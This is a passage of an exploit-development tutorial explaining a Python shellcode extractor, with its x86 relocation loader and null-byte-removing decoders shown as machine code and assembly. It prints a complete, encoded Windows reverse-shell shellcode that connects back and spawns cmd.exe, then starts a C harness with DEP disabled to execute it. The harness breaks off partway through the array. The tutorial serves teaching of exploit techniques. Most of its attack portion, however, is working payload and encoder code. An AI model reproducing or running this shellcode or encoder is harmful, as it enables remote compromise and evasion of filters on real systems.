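The idea is to append the strings contained in addr_to_strings to the end of our shellcode and then make our code reference those strings.

Unfortunately, the code-to-string linking must be done at runtime, because we don't know the starting address of the shellcode in advance. We therefore need to prepend a kind of "loader" that fixes the shellcode at runtime. This is the structure of the shellcode after the transformation:

[Figure: structure of the transformed shellcode]

The offX values are DWORDs that point to the locations in the original shellcode that need to be fixed. The loader fixes these locations so that they point to the correct strings strX. To see exactly how this works, try to understand the following code: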

    def add_loader_to_shellcode(shellcode, relocs, addr_to_strings):
        if len(relocs) == 0:
            return shellcode                # there are no relocations

        # The format of the new shellcode is:
        #       call    here
        #   here:
        #       ...
        #   shellcode_start:
        #       <shellcode>         (contains offsets to strX (offset are from "here" label))
        #   relocs:
        #       off1|off2|...       (offsets to relocations (offset are from "here" label))
        #       str1|str2|...

        delta = 21                                      # shellcode_start - here

        # Builds the first part (up to and not including the shellcode).
        x = dword_to_bytes(delta + len(shellcode))
        y = dword_to_bytes(len(relocs))
        code = [
            0xE8, 0x00, 0x00, 0x00, 0x00,               #   CALL here
                                                        # here:
            0x5E,                                       #   POP ESI
            0x8B, 0xFE,                                 #   MOV EDI, ESI
            0x81, 0xC6, x[0], x[1], x[2], x[3],         #   ADD ESI, shellcode_start + len(shellcode) - here
            0xB9, y[0], y[1], y[2], y[3],               #   MOV ECX, len(relocs)
            0xFC,                                       #   CLD
                                                        # again:
            0xAD,                                       #   LODSD
            0x01, 0x3C, 0x07,                           #   ADD [EDI+EAX], EDI
            0xE2, 0xFA                                  #   LOOP again
                                                        # shellcode_start:
        ]

        # Builds the final part (offX and strX).
        offset = delta + len(shellcode) + len(relocs) * 4           # offset from "here" label
        final_part = [dword_to_string(r + delta) for r in relocs]
        addr_to_offset = {}
        for addr in addr_to_strings.keys():
            str = addr_to_strings[addr]
            final_part.append(str)
            addr_to_offset[addr] = offset
            offset += len(str)

        # Fixes the shellcode so that the pointers referenced by relocs point to the
        # string in the final part.
        byte_shellcode = [ord(c) for c in shellcode]
        for off in relocs:
            addr = bytes_to_dword(byte_shellcode[off:off+4])
            byte_shellcode[off:off+4] = dword_to_bytes(addr_to_offset[addr])

        return ''.join([chr(b) for b in (code + byte_shellcode)]) + ''.join(final_part)

Let's have a look at the loader:

      CALL here                   ; PUSH EIP+5; JMP here
    here:
      POP ESI                     ; ESI = address of "here"
      MOV EDI, ESI                ; EDI = address of "here"
      ADD ESI, shellcode_start + len(shellcode) - here        ; ESI = address of off1
      MOV ECX, len(relocs)        ; ECX = number of locations to fix
      CLD                         ; tells LODSD to go forwards
    again:
      LODSD                       ; EAX = offX; ESI += 4
      ADD [EDI+EAX], EDI          ; fixes location within shellcode
      LOOP again                  ; DEC ECX; if ECX > 0 then JMP again
    shellcode_start:
      <shellcode>
    relocs:
      off1|off2|...
      str1|str2|...

First, the loader uses CALL to obtain the absolute address of here in memory. It uses this information to fix the offsets in the original shellcode. ESI points to off1, so LODSD is used to read the offsets one by one. The instruction

ADD [EDI+EAX], EDI

fixes the locations within the shellcode. EAX is the current offX, which is the offset of the location relative to here. This means that EDI+EAX is the absolute address of that location. The DWORD stored at that location is the offset of the correct string relative to here. By adding EDI to that DWORD, we turn it into the absolute address of the string. When the loader has finished, the shellcode, now fixed, is executed.
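To make the fix-up concrete, here is a minimal Python 3 emulation of the loader loop on a toy blob. The function `run_loader`, the address 500005h, the NOP padding that stands in for the rest of the loader, and the six-byte "shellcode" are all made up for the example; only the layout (offsets relative to here, with delta = 21) follows the text.

```python
import struct

def run_loader(blob, here_addr, table_off, num_relocs):
    """Emulate the loader on blob, whose byte 0 is the "here" label.

    table_off is the offset of off1 from "here" (what ESI points to).
    """
    mem = bytearray(blob)
    for i in range(num_relocs):                                     # LOOP again
        off = struct.unpack_from('<I', mem, table_off + 4 * i)[0]   # LODSD
        value = struct.unpack_from('<I', mem, off)[0]
        # ADD [EDI+EAX], EDI: offset from "here" becomes an absolute address
        struct.pack_into('<I', mem, off, (value + here_addr) & 0xFFFFFFFF)
    return bytes(mem)

delta = 21                                   # shellcode_start - here
# Toy shellcode: PUSH <offset of str1 from "here">; RET
shellcode = b'\x68' + struct.pack('<I', delta + 6 + 4) + b'\xc3'
blob = (b'\x90' * delta                      # stands in for the loader body
        + shellcode
        + struct.pack('<I', delta + 1)       # off1: location of the PUSH operand
        + b'cmd.exe\0')                      # str1

here = 0x500005                              # arbitrary run-time address of "here"
fixed = run_loader(blob, here, delta + len(shellcode), 1)
ptr = struct.unpack_from('<I', fixed, delta + 1)[0]
print(hex(ptr), fixed[ptr - here:ptr - here + 7])
```

After the loop, the PUSH operand holds an absolute address, and subtracting the address of here from it leads back to the string inside the blob.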

To sum up, add_loader_to_shellcode is called only if there are relocations. You can see this in the main function:

    <snip>
        if len(relocs) != 0:
            print('Found %d reference(s) to %d string(s) in .rdata' % (len(relocs), len(addr_to_strings)))
            print('Strings:')
            for s in addr_to_strings.values():
                print('  ' + s[:-1])
            print('')
            shellcode = add_loader_to_shellcode(shellcode, relocs, addr_to_strings)
        else:
            print('No relocations found')
    <snip>

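Removing null bytes from the `shellcode` (I)

I wrote two functions that remove null bytes:

1. get_fixed_shellcode_single_block
2. get_fixed_shellcode

The first function does not always work, but it produces shorter code, so it should be tried first. The second function produces longer code but is guaranteed to work.

Let's start with get_fixed_shellcode_single_block. Here is its definition: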

    def get_fixed_shellcode_single_block(shellcode):
        '''
        Returns a version of shellcode without null bytes or None if the
        shellcode can't be fixed.
        If this function fails, use get_fixed_shellcode().
        '''

        # Finds one non-null byte not present, if any.
        bytes = set([ord(c) for c in shellcode])
        missing_bytes = [b for b in range(1, 256) if b not in bytes]
        if len(missing_bytes) == 0:
            return None                             # shellcode can't be fixed
        missing_byte = missing_bytes[0]

        (xor1, xor2) = get_xor_values(len(shellcode))

        code = [
            0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                                # here:
            0xC0,                                               #   (FF)C0 = INC EAX
            0x5F,                                               #   POP EDI
            0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
            0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
            0x83, 0xC7, 29,                                     #   ADD EDI, shellcode_begin - here
            0x33, 0xF6,                                         #   XOR ESI, ESI
            0xFC,                                               #   CLD
                                                                # loop1:
            0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
            0x3C, missing_byte,                                 #   CMP AL, <missing byte>
            0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
            0xAA,                                               #   STOSB
            0xE2, 0xF6                                          #   LOOP loop1
                                                                # shellcode_begin:
        ]

        return ''.join([chr(x) for x in code]) + shellcode.replace('\0', chr(missing_byte))

The idea is simple. We analyze the shellcode byte by byte and check whether there is a missing value, i.e. a value from 1 to 255 that never appears in the shellcode. Say this value is 0x14. If we replace every 0x00 in the shellcode with 0x14, the shellcode no longer contains null bytes, but it can't run because it has been modified. The last step is to prepend a decoder to the shellcode which, at runtime, restores the null bytes before the original shellcode is executed. The decoder is defined in the array code:

      CALL $ + 4                                  ; PUSH "here"; JMP "here"-1
    here:
      (FF)C0 = INC EAX                            ; not important: just a NOP
      POP EDI                                     ; EDI = "here"
      MOV ECX, <xor value 1 for shellcode len>
      XOR ECX, <xor value 2 for shellcode len>    ; ECX = shellcode length
      ADD EDI, shellcode_begin - here             ; EDI = absolute address of original shellcode
      XOR ESI, ESI                                ; ESI = 0
      CLD                                         ; tells STOSB to go forwards
    loop1:
      MOV AL, BYTE PTR [EDI]                      ; AL = current byte of the shellcode
      CMP AL, <missing byte>                      ; is AL the special byte?
      CMOVE EAX, ESI                              ; if AL is the special byte, then EAX = 0
      STOSB                                       ; overwrite the current byte of the shellcode with AL
      LOOP loop1                                  ; DEC ECX; if ECX > 0 then JMP loop1
    shellcode_begin:
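The substitution and its inverse can be checked with a short round trip. This is a Python 3 sketch that models only the data transformation, not the machine-code decoder; the function names and the sample bytes are chosen for illustration.

```python
def encode_single_block(shellcode):
    """Replace every null byte with a value that never occurs in shellcode.

    Returns (missing_byte, encoded), or None if all 255 non-null values occur.
    """
    present = set(shellcode)
    missing = [b for b in range(1, 256) if b not in present]
    if not missing:
        return None
    return missing[0], shellcode.replace(b'\x00', bytes([missing[0]]))

def decode_single_block(missing_byte, encoded):
    """What loop1 does at run time: the special byte becomes 0x00 again."""
    return bytes(0 if b == missing_byte else b for b in encoded)

# Sample bytes with several nulls (MOV ECX, 400h; CALL $+10; RET).
original = bytes.fromhex('b900040000e805000000c3')
missing_byte, encoded = encode_single_block(original)
assert 0 not in encoded
assert decode_single_block(missing_byte, encoded) == original
print(hex(missing_byte), encoded.hex())
```

Decoding is unambiguous precisely because the chosen value never occurs in the original bytes, so every occurrence in the encoded form must have been a null.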

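There are two important details to discuss. First, this code must not contain null bytes itself, because otherwise we would need yet another piece of code to remove them.

As you can see, the CALL instruction does not jump to here, because otherwise its opcode would have been

E8 00 00 00 00               #   CALL here

which contains four null bytes. Since the CALL instruction is 5 bytes long, CALL here is equivalent to CALL $+5. The trick to get rid of the null bytes is to use CALL $+4 instead:

E8 FF FF FF FF               #   CALL $+4

That CALL skips 4 bytes and jumps to the last FF of the CALL itself. The CALL instruction is followed by the byte C0, so the instruction executed after the CALL is INC EAX, which corresponds to the opcode FF C0. Note that the value pushed onto the stack by the CALL is still the absolute address of the here label.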
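The arithmetic behind this trick can be checked with a few lines of Python 3. The helper `call_target` and the address 1000h are hypothetical; the encoding rule (target = address of the next instruction plus a signed 32-bit displacement) is the standard one for the E8 near CALL.

```python
import struct

def call_target(call_addr, encoded):
    """Return (target, return_address) of a 5-byte near CALL (opcode E8)."""
    assert encoded[0] == 0xE8 and len(encoded) == 5
    rel32 = struct.unpack('<i', encoded[1:])[0]   # signed displacement
    return_addr = call_addr + 5                   # value pushed on the stack
    return (return_addr + rel32) & 0xFFFFFFFF, return_addr

addr = 0x1000   # arbitrary address of the CALL, chosen for the example
print([hex(v) for v in call_target(addr, bytes.fromhex('e800000000'))])
print([hex(v) for v in call_target(addr, bytes.fromhex('e8ffffffff'))])
```

Both encodings push the same return address (the here label); only the jump target differs, landing one byte earlier, on the final FF, in the second case.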

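There is a second trick in the code to avoid null bytes:

MOV ECX, <xor value 1 for shellcode len>
XOR ECX, <xor value 2 for shellcode len>

We could have simply used

MOV ECX, <shellcode len>

but that would have produced null bytes. In fact, for a shellcode of length 0x400, we would have had

B9 00 04 00 00 MOV ECX, 400h

which contains 3 null bytes.

To avoid that, we choose a non-null byte that does not appear in 00000400h. Say we choose 0x01. Now we compute

<xor value 1 for shellcode len> = 00000400h xor 01010101h = 01010501h
<xor value 2 for shellcode len> = 01010101h

The result is that <xor value 1 for shellcode len> and <xor value 2 for shellcode len> are both free of null bytes and, when xored together, produce the original value 400h.

Our two instructions become:

B9 01 05 01 01        MOV ECX, 01010501h
81 F1 01 01 01 01     XOR ECX, 01010101h

The xor values are computed by the function get_xor_values.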
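The computation can be reproduced with a Python 3 sketch of the same idea. This version works on `bytes` objects and uses `struct`, so it is an illustrative rewrite rather than the function from the script.

```python
import struct

def get_xor_values(value):
    """Split a 32-bit value into (x, y) with x ^ y == value and no null bytes.

    Both results are returned as 4 bytes, least significant byte first.
    """
    value_bytes = struct.pack('<I', value)
    # A byte that differs from all four value bytes never XORs to zero
    # with any of them; at most 4 of the 255 candidates can be excluded.
    missing = next(b for b in range(1, 256) if b not in value_bytes)
    x = bytes(b ^ missing for b in value_bytes)
    y = bytes([missing] * 4)
    return x, y

x, y = get_xor_values(0x400)
print(x[::-1].hex(), y[::-1].hex())   # most significant byte first
```

For 400h this prints 01010501 and 01010101, the two operands used in the instructions above.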

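With that said, the code is easy to understand: it walks through the shellcode byte by byte and overwrites with null bytes the bytes that contain the special value (0x14 in our earlier example).

Removing null bytes from the shellcode (II)

The method above can fail, because we may be unable to find a byte value that never appears in the shellcode. If that happens, we need to use get_fixed_shellcode, which is somewhat more complex.

The idea is to divide the shellcode into blocks of 254 bytes. Note that every block must have a "missing byte", because a byte can take 255 non-zero values. We could choose a missing byte for each block and handle each block individually. That would not be very space efficient, however, because for a shellcode of 254*N bytes we would need to store N "missing bytes" before or after the shellcode (the decoder needs to know the missing bytes). A more efficient approach is to use the same "missing byte" for as many 254-byte blocks as possible. We start from the beginning of the shellcode and keep taking blocks until no missing byte is left; at that point the last block taken becomes the first block of a new chunk. We continue until we have processed the last block. In the end, we have a list of <missing_byte, num_blocks> pairs:

[(missing_byte1, num_blocks1), (missing_byte2, num_blocks2), ...]

I decided to restrict num_blocksX to a single byte, so num_blocksX is between 1 and 255.

Here is the part of get_fixed_shellcode that splits the shellcode into chunks: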

    def get_fixed_shellcode(shellcode):
        '''
        Returns a version of shellcode without null bytes. This version divides
        the shellcode into multiple blocks and should be used only if
        get_fixed_shellcode_single_block() doesn't work with this shellcode.
        '''

        # The format of bytes_blocks is
        #   [missing_byte1, number_of_blocks1,
        #    missing_byte2, number_of_blocks2, ...]
        # where missing_byteX is the value used to overwrite the null bytes in the
        # shellcode, while number_of_blocksX is the number of 254-byte blocks where
        # to use the corresponding missing_byteX.
        bytes_blocks = []
        shellcode_len = len(shellcode)
        i = 0
        while i < shellcode_len:
            num_blocks = 0
            missing_bytes = list(range(1, 256))

            # Tries to find as many 254-byte contiguous blocks as possible which misses at
            # least one non-null value. Note that a single 254-byte block always misses at
            # least one non-null value.
            while True:
                if i >= shellcode_len or num_blocks == 255:
                    bytes_blocks += [missing_bytes[0], num_blocks]
                    break
                bytes = set([ord(c) for c in shellcode[i:i+254]])
                new_missing_bytes = [b for b in missing_bytes if b not in bytes]
                if len(new_missing_bytes) != 0:         # new block added
                    missing_bytes = new_missing_bytes
                    num_blocks += 1
                    i += 254
                else:
                    # bytes is a set here; the pair belongs in bytes_blocks.
                    bytes_blocks += [missing_bytes[0], num_blocks]
                    break
    <snip>

As before, we need to discuss the "decoder" that is prepended to the shellcode. This decoder is a bit longer than the previous one, but the principle is the same.

Here is the code:

    code = ([
        0xEB, len(bytes_blocks)] +                          #   JMP SHORT skip_bytes
                                                            # bytes:
        bytes_blocks + [                                    #   ...
                                                            # skip_bytes:
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
        0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]
        0x83, 0xC7, 0x30,                                   #   ADD EDI, shellcode_begin - here
                                                            # loop1:
        0xB0, 0xFE,                                         #   MOV AL, 0FEh
        0xF6, 0x63, 0x01,                                   #   MUL AL, BYTE PTR [EBX+1]
        0x0F, 0xB7, 0xD0,                                   #   MOVZX EDX, AX
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop2:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3A, 0x03,                                         #   CMP AL, BYTE PTR [EBX]
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0x49,                                               #   DEC ECX
        0x74, 0x07,                                         #   JE shellcode_begin
        0x4A,                                               #   DEC EDX
        0x75, 0xF2,                                         #   JNE loop2
        0x43,                                               #   INC EBX
        0x43,                                               #   INC EBX
        0xEB, 0xE3                                          #   JMP loop1
                                                            # shellcode_begin:
    ])

bytes_blocks is the array

[missing_byte1, num_blocks1, missing_byte2, num_blocks2, ...]

that we discussed earlier, but flattened, without the pairs.

Note that the code starts with a JMP SHORT instruction that skips bytes_blocks. For this to work, len(bytes_blocks) must be less than or equal to 0x7F. But as you can see, len(bytes_blocks) also appears in another instruction:

0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]

This requires len(bytes_blocks) to be less than or equal to 0x7F - 5, so this is the decisive condition. This is what happens if the condition is violated:

    if len(bytes_blocks) > 0x7f - 5:
        # Can't assemble "LEA EBX, [EDI + (bytes-here)]" or "JMP skip_bytes".
        return None

Let's review the code in more detail:

      JMP SHORT skip_bytes
    bytes:
      ...
    skip_bytes:
      CALL $ + 4                                  ; PUSH "here"; JMP "here"-1
    here:
      (FF)C0 = INC EAX                            ; not important: just a NOP
      POP EDI                                     ; EDI = absolute address of "here"
      MOV ECX, <xor value 1 for shellcode len>
      XOR ECX, <xor value 2 for shellcode len>    ; ECX = shellcode length
      LEA EBX, [EDI + (bytes - here)]             ; EBX = absolute address of "bytes"
      ADD EDI, shellcode_begin - here             ; EDI = absolute address of the shellcode
    loop1:
      MOV AL, 0FEh                                ; AL = 254
      MUL AL, BYTE PTR [EBX+1]                    ; AX = 254 * current num_blocksX = num bytes
      MOVZX EDX, AX                               ; EDX = num bytes of the current chunk
      XOR ESI, ESI                                ; ESI = 0
      CLD                                         ; tells STOSB to go forwards
    loop2:
      MOV AL, BYTE PTR [EDI]                      ; AL = current byte of shellcode
      CMP AL, BYTE PTR [EBX]                      ; is AL the missing byte for the current chunk?
      CMOVE EAX, ESI                              ; if it is, then EAX = 0
      STOSB                                       ; replaces the current byte of the shellcode with AL
      DEC ECX                                     ; ECX -= 1
      JE shellcode_begin                          ; if ECX == 0, then we're done!
      DEC EDX                                     ; EDX -= 1
      JNE loop2                                   ; if EDX != 0, then we keep working on the current chunk
      INC EBX                                     ; EBX += 1  (moves to next pair...
      INC EBX                                     ; EBX += 1   ... missing_bytes, num_blocks)
      JMP loop1                                   ; starts working on the next chunk
    shellcode_begin:
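The chunking scheme and the decoder's two nested loops can be modelled in Python 3 and checked with a round trip. This is a sketch of the data transformation only; the function names are illustrative and the test input (every byte value repeated three times) is artificial, chosen so that no single missing byte exists for the whole buffer.

```python
BLOCK = 254

def split_into_chunks(shellcode):
    """Return the flat list [missing_byte1, num_blocks1, ...]."""
    pairs, i = [], 0
    while i < len(shellcode):
        missing, num_blocks = list(range(1, 256)), 0
        while i < len(shellcode) and num_blocks < 255:
            block = set(shellcode[i:i + BLOCK])
            still_missing = [b for b in missing if b not in block]
            if not still_missing:
                break                   # this block starts the next chunk
            missing, num_blocks, i = still_missing, num_blocks + 1, i + BLOCK
        pairs += [missing[0], num_blocks]
    return pairs

def encode(shellcode, pairs):
    """Replace the nulls of each chunk with that chunk's missing byte."""
    out, pos = bytearray(), 0
    for missing, num_blocks in zip(pairs[0::2], pairs[1::2]):
        chunk = shellcode[pos:pos + BLOCK * num_blocks]
        out += chunk.replace(b'\x00', bytes([missing]))
        pos += BLOCK * num_blocks
    return bytes(out)

def decode(encoded, pairs):
    """Mirror of loop1/loop2: ECX counts all bytes, EDX the current chunk."""
    out, pos, pair = bytearray(encoded), 0, 0
    remaining = len(encoded)                                   # ECX
    while remaining:
        missing, chunk_len = pairs[pair], BLOCK * pairs[pair + 1]   # EDX
        while remaining and chunk_len:
            if out[pos] == missing:
                out[pos] = 0
            pos, remaining, chunk_len = pos + 1, remaining - 1, chunk_len - 1
        pair += 2
    return bytes(out)

shellcode = bytes(range(256)) * 3      # contains every byte value
pairs = split_into_chunks(shellcode)
encoded = encode(shellcode, pairs)
assert 0 not in encoded and decode(encoded, pairs) == shellcode
print(pairs)
```

With this input each chunk ends up holding a single 254-byte block, which is the worst case for the size of bytes_blocks; typical shellcode shares one missing byte across several blocks.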

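Testing the script

This is the easy part. If we run the script without any arguments, it prints:

    Shellcode Extractor by Massimiliano Tomassoli (2015)

    Usage:
      sce.py <exe file> <map file>

As you may remember, we also told the VS 2013 linker to produce a map file. Just call the script with the path to the exe file and the path to the map file. Here is what we get for our reverse shell: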

    Shellcode Extractor by Massimiliano Tomassoli (2015)

    Extracting shellcode length from "mapfile"...
    shellcode length: 614
    Extracting shellcode from "shellcode.exe" and analyzing relocations...
    Found 3 reference(s) to 3 string(s) in .rdata
    Strings:
      ws2_32.dll
      cmd.exe
      127.0.0.1

    Fixing the shellcode...
    final shellcode length: 715

    char shellcode[] =
    "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xa8\x03\x01\x01\x81\xf1\x01\x01"
    "\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
    "\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x7b\x02\x05\x05"
    "\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83"
    "\xe4\xf8\x81\xec\x24\x02\x05\x05\x53\x56\x57\xb9\x8d\x10\xb7\xf8"
    "\xe8\xa5\x01\x05\x05\x68\x87\x02\x05\x05\xff\xd0\xb9\x40\xd5\xdc"
    "\x2d\xe8\x94\x01\x05\x05\xb9\x6f\xf1\xd4\x9f\x8b\xf0\xe8\x88\x01"
    "\x05\x05\xb9\x82\xa1\x0d\xa5\x8b\xf8\xe8\x7c\x01\x05\x05\xb9\x70"
    "\xbe\x1c\x23\x89\x44\x24\x18\xe8\x6e\x01\x05\x05\xb9\xd1\xfe\x73"
    "\x1b\x89\x44\x24\x0c\xe8\x60\x01\x05\x05\xb9\xe2\xfa\x1b\x01\xe8"
    "\x56\x01\x05\x05\xb9\xc9\x53\x29\xdc\x89\x44\x24\x20\xe8\x48\x01"
    "\x05\x05\xb9\x6e\x85\x1c\x5c\x89\x44\x24\x1c\xe8\x3a\x01\x05\x05"
    "\xb9\xe0\x53\x31\x4b\x89\x44\x24\x24\xe8\x2c\x01\x05\x05\xb9\x98"
    "\x94\x8e\xca\x8b\xd8\xe8\x20\x01\x05\x05\x89\x44\x24\x10\x8d\x84"
    "\x24\xa0\x05\x05\x05\x50\x68\x02\x02\x05\x05\xff\xd6\x33\xc9\x85"
    "\xc0\x0f\x85\xd8\x05\x05\x05\x51\x51\x51\x6a\x06\x6a\x01\x6a\x02"
    "\x58\x50\xff\xd7\x8b\xf0\x33\xff\x83\xfe\xff\x0f\x84\xc0\x05\x05"
    "\x05\x8d\x44\x24\x14\x50\x57\x57\x68\x9a\x02\x05\x05\xff\x54\x24"
    "\x2c\x85\xc0\x0f\x85\xa8\x05\x05\x05\x6a\x02\x57\x57\x6a\x10\x8d"
    "\x44\x24\x58\x50\x8b\x44\x24\x28\xff\x70\x10\xff\x70\x18\xff\x54"
    "\x24\x40\x6a\x02\x58\x66\x89\x44\x24\x28\xb8\x05\x7b\x05\x05\x66"
    "\x89\x44\x24\x2a\x8d\x44\x24\x48\x50\xff\x54\x24\x24\x57\x57\x57"
    "\x57\x89\x44\x24\x3c\x8d\x44\x24\x38\x6a\x10\x50\x56\xff\x54\x24"
    "\x34\x85\xc0\x75\x5c\x6a\x44\x5f\x8b\xcf\x8d\x44\x24\x58\x33\xd2"
    "\x88\x10\x40\x49\x75\xfa\x8d\x44\x24\x38\x89\x7c\x24\x58\x50\x8d"
    "\x44\x24\x5c\xc7\x84\x24\x88\x05\x05\x05\x05\x01\x05\x05\x50\x52"
    "\x52\x52\x6a\x01\x52\x52\x68\x92\x02\x05\x05\x52\x89\xb4\x24\xc0"
    "\x05\x05\x05\x89\xb4\x24\xbc\x05\x05\x05\x89\xb4\x24\xb8\x05\x05"
    "\x05\xff\x54\x24\x34\x6a\xff\xff\x74\x24\x3c\xff\x54\x24\x18\x33"
    "\xff\x57\xff\xd3\x5f\x5e\x33\xc0\x5b\x8b\xe5\x5d\xc3\x33\xd2\xeb"
    "\x10\xc1\xca\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0"
    "\x41\x8a\x01\x84\xc0\x75\xea\x8b\xc2\xc3\x55\x8b\xec\x83\xec\x14"
    "\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b"
    "\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8d\x47\xf8"
    "\x8b\x3f\x8b\x70\x18\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
    "\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x9e\xff\xff\xff\x8b"
    "\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xc0\x89\x4d\xf0\x89\x45\xfc"
    "\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x7d\xff\xff\xff"
    "\x03\x45\xf8\x39\x45\xf4\x74\x1e\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
    "\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\xa0\x33\xc0\x5f"
    "\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48"
    "\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6"
    "\xeb\xdd\x2f\x05\x05\x05\xf2\x05\x05\x05\x80\x01\x05\x05\x77\x73"
    "\x32\x5f\x33\x32\x2e\x64\x6c\x6c\x05\x63\x6d\x64\x2e\x65\x78\x65"
    "\x05\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x05";

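The part about relocations is important, because it lets you check that everything is OK. For example, we know that our reverse shell uses 3 strings, and all of them were correctly extracted from the .rdata section. We can also see that the original shellcode is 614 bytes long and that the resulting shellcode (after handling relocations and null bytes) is 715 bytes long.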
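The two lengths can be reconciled with a little arithmetic, sketched here in Python 3. It assumes that each string is stored once together with its terminating null, and that the single-block decoder was the one applied (the output starts with its byte sequence); the loader and decoder sizes are counted from the code lists shown earlier.

```python
original_len = 614          # "shellcode length" reported by the script
loader_len = 26             # bytes in the code list of add_loader_to_shellcode
strings = [b'ws2_32.dll\0', b'cmd.exe\0', b'127.0.0.1\0']
reloc_table_len = 4 * 3     # one DWORD per reference found

with_loader = (original_len + loader_len + reloc_table_len
               + sum(len(s) for s in strings))

decoder_len = 34            # bytes in the code list of get_fixed_shellcode_single_block
final_len = with_loader + decoder_len
print(with_loader, final_len)
```

The intermediate value 681 is 2A9h, which is consistent with the MOV ECX/XOR ECX pair at the start of the output (01 01 03 A8h xor 01010101h).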

Now we need to run the resulting shellcode. Here is the complete source code:

    #include <cstring>
    #include <cassert>

    // Important: Disable DEP!
    //  (Linker->Advanced->Data Execution Prevention = NO)

    void main() {
        char shellcode[] =
            "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xa8\x03\x01\x01\x81\xf1\x01\x01"
            "\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
            "\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x7b\x02\x05\x05"
            "\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83"
            "\xe4\xf8\x81\xec\x24\x02\x05\x05\x53\x56\x57\xb9\x8d\x10\xb7\xf8"
            "\xe8\xa5\x01\x05\x05\x68\x87\x02\x05\x05\xff\xd0\xb9\x40\xd5\xdc"
            "\x2d\xe8\x94\x01\x05\x05\xb9\x6f\xf1\xd4\x9f\x8b\xf0\xe8\x88\x01"
            "\x05\x05\xb9\x82\xa1\x0d\xa5\x8b\xf8\xe8\x7c\x01\x05\x05\xb9\x70"
            "\xbe\x1c\x23\x89\x44\x24\x18\xe8\x6e\x01\x05\x05\xb9\xd1\xfe\x73"
            "\x1b\x89\x44\x24\x0c\xe8\x60\x01\x05\x05\xb9\xe2\xfa\x1b\x01\xe8"
            "\x56\x01\x05\x05\xb9\xc9\x53\x29\xdc\x89\x44\x24\x20\xe8\x48\x01"
            "\x05\x05\xb9\x6e\x85\x1c\x5c\x89\x44\x24\x1c\xe8\x3a\x01\x05\x05"
            "\xb9\xe0\x53\x31\x4b\x89\x44\x24\x24\xe8\x2c\x01\x05\x05\xb9\x98"
            "\x94\x8e\xca\x8b\xd8\xe8\x20\x01\x05\x05\x89\x44\x24\x10\x8d\x84"
            "\x24\xa0\x05\x05\x05\x50\x68\x02\x02\x05\x05\xff\xd6\x33\xc9\x85"
            "\xc0\x0f\x85\xd8\x05\x05\x05\x51\x51\x51\x6a\x06\x6a\x01\x6a\x02"
            "\x58\x50\xff\xd7\x8b\xf0\x33\xff\x83\xfe\xff\x0f\x84\xc0\x05\x05"
            "\x05\x8d\x44\x24\x14\x50\x57\x57\x68\x9a\x02\x05\x05\xff\x54\x24"
            "\x2c\x85\xc0\x0f\x85\xa8\x05\x05\x05\x6a\x02\x57\x57\x6a\x10\x8d"
            "\x44\x24\x58\x50\x8b\x44\x24\x28\xff\x70\x10\xff\x70\x18\xff\x54"
            "\x24\x40\x6a\x02\x58\x66\x89\x44\x24\x28\xb8\x05\x7b\x05\x05\x66"
            "\x89\x44\x24\x2a\x8d\x44\x24\x48\x50\xff\x54\x24\x24\x57\x57\x57"
            "\x57\x89\x44\x24\x3c\x8d\x44\x24\x38\x6a\x10\x50\x56\xff\x54\x24"
            "\x34\x85\xc0\x75\x5c\x6a\x44\x5f\x8b\xcf\x8d\x44\x24\x58\x33\xd2"
            "\x88\x10\x40\x49\x75\xfa\x8d\x44\x24\x38\x89\x7c\x24\x58\x50\x8d"
            "\x44\x24\x5c\xc7\x84\x24\x88\x05\x05\x05\x05\x01\x05\x05\x50\x52"
            "\x52\x52\x6a\x01\x52\x52\x68\x92\x02\x05\x05\x52\x89\xb4\x24\xc0"
            "\x05\x05\x05\x89\xb4\x24\xbc\x05\x05\x05\x89\xb4\x24\xb8\x05\x05"
